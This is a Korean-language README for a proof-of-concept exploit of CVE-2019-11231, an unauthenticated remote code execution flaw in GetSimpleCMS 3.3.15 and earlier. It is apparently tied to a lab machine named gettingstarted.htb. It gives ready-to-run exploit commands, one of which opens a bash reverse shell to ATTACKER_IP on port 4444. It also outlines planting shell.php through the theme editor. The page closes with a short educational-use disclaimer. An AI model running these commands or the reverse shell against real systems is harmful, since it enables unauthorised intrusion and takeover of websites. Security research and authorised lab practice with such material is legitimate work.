
CVE-2019-11231 PoC
GetSimpleCMS ≤ 3.3.15용 인증 없는 원격 코드 실행 익스플로잇
GetSimpleCMS는 민감한 파일을 공개적으로 노출합니다 (/data/other/authorization.xml, /data/users/). 이를 통해 공격자는 다음을 수행할 수 있습니다:
CVSS 점수: 9.8 (치명적)
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
/admin//data/other/authorization.xml/data/users//admin/theme-edit.php/admin/theme-edit.php/theme/shell.php?cmd=...exploit.py - 주요 익스플로잇 스크립트requirements.txt - 의존성 (requests, beautifulsoup4)⚠️ 교육 목적으로만 사용하세요. 소유하거나 테스트 권한이 있는 시스템에서만 테스트하십시오.